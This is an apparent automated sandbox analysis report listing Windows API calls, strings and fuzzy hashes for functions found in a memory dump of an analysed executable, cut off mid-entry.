Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 201b1b97413796ca54a64d8207bbd679b3c38902c7bf430d765ac6e7b40d1eab
Instruction ID: f02e1fb3b2a66220049d55c9aeab3e9a23e4653511dc154d0765e1fa566dd4f8
Opcode Fuzzy Hash: 201b1b97413796ca54a64d8207bbd679b3c38902c7bf430d765ac6e7b40d1eab
Instruction Fuzzy Hash: BAC0923068C214FAFA304A90CC4AF387638B701B01F104040F389A80C0C6A668084A14

Uniqueness

Uniqueness Score: -1.00%

Function 00FC0C1C, Relevance: 1.3, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00FC0CCB

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a613f20267d32b8e3342a030072a27dc15b54109ec97b7bae506172d3739ba8d
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: AB31D571A04106DBC718DF58C691B69F7A5FF49310B2487A9E40ACB251DB31EDC2EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD9C0, Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00FBD9DD

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0b58ba2cd42263a2252bfdc450a1ca4241e040e8915083060280eb42ddd07cfb
Instruction ID: b8c690035f5bc314f8a86a6cc19b5e93e38c24ed3eaac3af8296f398b0e3dc34
Opcode Fuzzy Hash: 0b58ba2cd42263a2252bfdc450a1ca4241e040e8915083060280eb42ddd07cfb
Instruction Fuzzy Hash: 9DE0DEB5900B019A87318F1BE444416FBF8AFE46613248E1FD5E6C2A64D3B4A5899F51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FE43FF, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00FE4407
FindWindowW.USER32 ref: 00FE442D
IsIconic.USER32(?), ref: 00FE4436
ShowWindow.USER32(?,00000009), ref: 00FE4443
SetForegroundWindow.USER32 ref: 00FE4451
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FE4468
GetCurrentThreadId.KERNEL32 ref: 00FE446C
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FE447A
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00FE4489
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00FE448F
AttachThreadInput.USER32(00000000,?,00000001), ref: 00FE4498
SetForegroundWindow.USER32 ref: 00FE449E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE44AD
keybd_event.USER32 ref: 00FE44B6
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE44C4
keybd_event.USER32 ref: 00FE44CD
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE44DB
keybd_event.USER32 ref: 00FE44E4
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE44F2
keybd_event.USER32 ref: 00FE44FB
SetForegroundWindow.USER32 ref: 00FE4505
AttachThreadInput.USER32(00000000,?,00000000), ref: 00FE4526
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00FE452C

Strings

Shell_TrayWnd, xrefs: 00FE4428

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 2889586943-2988720461
Opcode ID: d4c46da806866c80262b4543d4f3c97c6b7513915488cd0b1d3fa26007fdbfc9
Instruction ID: cefc6797ddb63eab3a65aef72c0be264a60f7377b1c3fafff3c25ab0c6410db9
Opcode Fuzzy Hash: d4c46da806866c80262b4543d4f3c97c6b7513915488cd0b1d3fa26007fdbfc9
Instruction Fuzzy Hash: B6418572B403087FE7305BA5AC4AFBE7B6CEF48B11F10401AFA41DA1C4C6B56950ABB1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF6219, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 234processCOMMON

Download Yara Rule

APIs

DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00FF6294
CloseHandle.KERNEL32(?), ref: 00FF62A6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FF62BE
GetProcessWindowStation.USER32 ref: 00FF62D7
SetProcessWindowStation.USER32 ref: 00FF62E1
OpenDesktopW.USER32 ref: 00FF62FD
_wcslen.LIBCMT ref: 00FF639E

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

_wcsncpy.LIBCMT ref: 00FF63C6
LoadUserProfileW.USERENV(?,00000020), ref: 00FF63DF
CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 00FF63F9
CreateProcessAsUserW.ADVAPI32 ref: 00FF6428
UnloadUserProfile.USERENV(?,?), ref: 00FF645B
CloseWindowStation.USER32(00000000), ref: 00FF6472
CloseDesktop.USER32 ref: 00FF6480
SetProcessWindowStation.USER32 ref: 00FF648E
CloseHandle.KERNEL32(?), ref: 00FF6498
DestroyEnvironmentBlock.USERENV(?), ref: 00FF64AF

Strings

default, xrefs: 00FF62F8
, xrefs: 00FF624E
winsta0, xrefs: 00FF62B9

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
String ID: $default$winsta0
API String ID: 3324942560-1027155976
Opcode ID: 4b4596f31de1e078dcf3ac38136ae4c230ca2e160281a2195e164ce32fd988dc
Instruction ID: 61ce083cb386d28787d0c39b111918f341b353d63ba7b2470f9b32763856d268
Opcode Fuzzy Hash: 4b4596f31de1e078dcf3ac38136ae4c230ca2e160281a2195e164ce32fd988dc
Instruction Fuzzy Hash: EB815B70E00249ABDB10DFA4D88AFAF7BBCAF48714F048108FA10E7295DB75D905DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FE33A3, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00FE33B3
OpenProcessToken.ADVAPI32(00000000), ref: 00FE33BA
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00FE33CF
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00FE33F3
GetLastError.KERNEL32 ref: 00FE33F9
ExitWindowsEx.USER32(?,00000000), ref: 00FE341C
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00FE344B
SetSystemPowerState.KERNEL32 ref: 00FE345E

Strings

SeShutdownPrivilege, xrefs: 00FE33C8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
String ID: SeShutdownPrivilege
API String ID: 2938487562-3733053543
Opcode ID: 6ff9ae2c00e5ee047071714dac1bc7e816fba98177bbebe9a20710157f72e368
Instruction ID: 619ee4eb7a8f03fd2521ce8251746e2926eb21a7e4e64c70fcf3f15a41c0fcf9
Opcode Fuzzy Hash: 6ff9ae2c00e5ee047071714dac1bc7e816fba98177bbebe9a20710157f72e368
Instruction Fuzzy Hash: 2921D571B40205ABFB20DAA5EC4EFBAB7ACEB48711F144044FD49D71C1DABB9D049761

Uniqueness

Uniqueness Score: -1.00%

Function 00FF602A, Relevance: 16.7, APIs: 11, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00FE6DB5: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FE6DCF
Part of subcall function 00FE6DB5: GetLastError.KERNEL32(?,00000000,?), ref: 00FE6DD9
Part of subcall function 00FE6DB5: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FE6DFF

Part of subcall function 00FE6D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00FE6D9C

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FF6090
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FF60C4
GetLengthSid.ADVAPI32(?), ref: 00FF60D6
GetAce.ADVAPI32(?,00000000,?), ref: 00FF6113
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FF612F
GetLengthSid.ADVAPI32(?), ref: 00FF6147
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FF6170
CopySid.ADVAPI32(00000000), ref: 00FF6177
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FF61A9
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FF61CB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FF61DE

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1255039815-0
Opcode ID: 3c58712575b62450b119aef926ef9a212536536f80a1610bcabb33be5dbba453
Instruction ID: 4f0d0feb3430c1dcbab6dfe614dd6dd7e418abf518fd60289553f7f2e2090641
Opcode Fuzzy Hash: 3c58712575b62450b119aef926ef9a212536536f80a1610bcabb33be5dbba453
Instruction Fuzzy Hash: AB516D71900219ABDB20DFA5CC84EFEB77DAF45B50F048508F655E7242DA39EA09DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100A0FC, Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 0100A137
EmptyClipboard.USER32 ref: 0100A13D
CloseClipboard.USER32 ref: 0100A143
GlobalAlloc.KERNEL32(00000002,?,?,?), ref: 0100A163

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 672644d068a7ffde867051776e653a652017276d1aedb033a8dc6f211cc1f1fb
Instruction ID: 5c8379fc1bccb44adc6ba56a98443088528aff6b8f35a11d5d3618677a40c526
Opcode Fuzzy Hash: 672644d068a7ffde867051776e653a652017276d1aedb033a8dc6f211cc1f1fb
Instruction Fuzzy Hash: 0741E3726002059FD320EF65EC89BAEB7A8FF08311F108159F945CB291DB7AE941DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0101C06C, Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0101C0DC
_wcslen.LIBCMT ref: 0101C0EE
CreateBindCtx.OLE32(00000000,?), ref: 0101C198
MkParseDisplayName.OLE32(?,?,?,?), ref: 0101C1DE

Part of subcall function 01001AB8: GetLastError.KERNEL32(?,?,00000000), ref: 01001B16
Part of subcall function 01001AB8: VariantCopy.OLEAUT32(?,?), ref: 01001B6E
Part of subcall function 01001AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 01001B84
Part of subcall function 01001AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 01001B9D
Part of subcall function 01001AB8: VariantClear.OLEAUT32(-00000058), ref: 01001C17

CLSIDFromProgID.OLE32(00000000,?), ref: 0101C284
GetActiveObject.OLEAUT32(?,00000000,?), ref: 0101C29E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
String ID:
API String ID: 2728119192-0
Opcode ID: 96063e7d493f4c240c6c72ec6d3556430dfba518815d3703341eee4f60fd096a
Instruction ID: d687143b54b5b6fd146bf8b4d525ecd868f817dc1bffb50b466c3057be2ebe4a
Opcode Fuzzy Hash: 96063e7d493f4c240c6c72ec6d3556430dfba518815d3703341eee4f60fd096a
Instruction Fuzzy Hash: 4E816E71648341AFE700EBA4CC81F9BB3E8BF89704F00491DF68597295DB79E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01002408, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

FindFirstFileW.KERNEL32(?,?), ref: 01002455
Sleep.KERNEL32(0000000A), ref: 01002481
FindNextFileW.KERNEL32(?,?), ref: 0100255F
FindClose.KERNEL32(?), ref: 01002575

Strings

*.*, xrefs: 01002436

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
String ID: *.*
API String ID: 2786137511-438819550
Opcode ID: e1562878cbb25917247fa0a4807639103c94389c90e42f08e3005ce2e7be0d77
Instruction ID: 075eb1f9293a55010cd54832745542ce501dc31e07114301b89f55d889f08a61
Opcode Fuzzy Hash: e1562878cbb25917247fa0a4807639103c94389c90e42f08e3005ce2e7be0d77
Instruction Fuzzy Hash: 0641E171A002199FEF55DF68CC99AEE7BB8FF48300F048489E949A7281D735DA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3321, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00FE332E
mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00FE3344
__wcsicoll.LIBCMT ref: 00FE335A
mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FE3370

Strings

DOWN, xrefs: 00FE3354

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicollmouse_event
String ID: DOWN
API String ID: 1033544147-711622031
Opcode ID: e1631e5b911d44dcc57b5d8640ba6fe53b504071b85342a23036fdcaf3718cc9
Instruction ID: 5551c1377d8c9ff35a5773e7d01751c3c72eae1e126ec08509b10955d4d2470a
Opcode Fuzzy Hash: e1631e5b911d44dcc57b5d8640ba6fe53b504071b85342a23036fdcaf3718cc9
Instruction Fuzzy Hash: 54F0ED72A883203EE81066953C0BFF7339C9B226A7F001111FE0CD6185EA662E1666F1

Uniqueness

Uniqueness Score: -1.00%

Function 010265D3, Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01014E62: inet_addr.WSOCK32(?), ref: 01014E86

socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 01026629
WSAGetLastError.WSOCK32(00000000), ref: 0102664C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: a128d978e9e8b0187361aabc3cc62a8e09ac772348699d6bc30f12147e285a52
Instruction ID: 8ee267cfa7cbcc47913ad85fdff4fd8df496ffef9b7b7c01f225efd72cb60411
Opcode Fuzzy Hash: a128d978e9e8b0187361aabc3cc62a8e09ac772348699d6bc30f12147e285a52
Instruction Fuzzy Hash: F341E6316002046FE720EF78DC86F9A77D8AF44724F148655F9459B3C2DABAE8419B91

Uniqueness

Uniqueness Score: -1.00%

Function 01006308, Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0100631D
ScreenToClient.USER32(?,?), ref: 0100633A
GetAsyncKeyState.USER32 ref: 01006377
GetAsyncKeyState.USER32 ref: 01006387
GetWindowLongW.USER32(?,000000F0), ref: 010063DD

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorLongScreenWindow
String ID:
API String ID: 3539004672-0
Opcode ID: 19c9058bd935d3010a2bc926405fc49b5f5443bf0f638f758a857e759698b90d
Instruction ID: dab127351d4d4baa3429be823af03a40fb083b36173d1712f36bc43202333572
Opcode Fuzzy Hash: 19c9058bd935d3010a2bc926405fc49b5f5443bf0f638f758a857e759698b90d
Instruction Fuzzy Hash: 52413475504215BFEB25CF68C844EEFBBBAEF45310F104649F9A5972C4CB31AA50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0102A2EA, Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0101F356: IsWindow.USER32(00000000), ref: 0101F386

IsWindowVisible.USER32 ref: 0102A322
IsWindowEnabled.USER32 ref: 0102A332
GetForegroundWindow.USER32 ref: 0102A33F
IsIconic.USER32 ref: 0102A34D
IsZoomed.USER32 ref: 0102A35B

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 0ece4171d365dc597017c8258712e0c68131cea33c89232207603ebffd4fd703
Instruction ID: df36c06a3f6a7dee4dcdf9631c9ca3abe94e97bff84278cd3483e7c07aa52fe0
Opcode Fuzzy Hash: 0ece4171d365dc597017c8258712e0c68131cea33c89232207603ebffd4fd703
Instruction Fuzzy Hash: 16119332700121AFE7219F2AEC04B9EBBECAF55711F148469F584D7240DBB9E9429BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FCA128, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00FD1EE1
SetUnhandledExceptionFilter.KERNEL32 ref: 00FD1EF6
UnhandledExceptionFilter.KERNEL32(010343DC), ref: 00FD1F01
GetCurrentProcess.KERNEL32(C0000409), ref: 00FD1F1D
TerminateProcess.KERNEL32(00000000), ref: 00FD1F24

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 0ce808a6883b6979812e97b5cc0f3c8664de62884eb10c35e63b4ec98732b4f5
Instruction ID: 3a4ebf5b2d68bb13eb650a9444fcf5d62decb1e1115a49f423b157f831a5b506
Opcode Fuzzy Hash: 0ce808a6883b6979812e97b5cc0f3c8664de62884eb10c35e63b4ec98732b4f5
Instruction Fuzzy Hash: 2621FCFC801204DFD764EF68EB856447BA5BB08300F004A5AF98887358E7BB68888F42

Uniqueness

Uniqueness Score: -1.00%

Function 0101E0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF2654: _wcslen.LIBCMT ref: 00FF2680

CoInitialize.OLE32(00000000), ref: 0101E16E
CoCreateInstance.OLE32(01032A08,00000000,00000001,010328A8,?), ref: 0101E187
CoUninitialize.OLE32 ref: 0101E1A6

Strings

.lnk, xrefs: 0101E141, 0101E15E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: cd05d93b331a74050f56de68ebda3823d0f55208827579d4394a1ca155879541
Instruction ID: c7900c5b24ac1928e02991efb7e5e16790dca9c8a421cb0ecdc66516de4a532e
Opcode Fuzzy Hash: cd05d93b331a74050f56de68ebda3823d0f55208827579d4394a1ca155879541
Instruction Fuzzy Hash: B5A15B75A042029FC705DF68C884A9FB7E9BF88710F14894CF9959B395CB35EC45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FFF3A6, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFCF87

Strings

\, xrefs: 00FFCFD7
U, xrefs: 00FFFAFE

Memory Dump Source

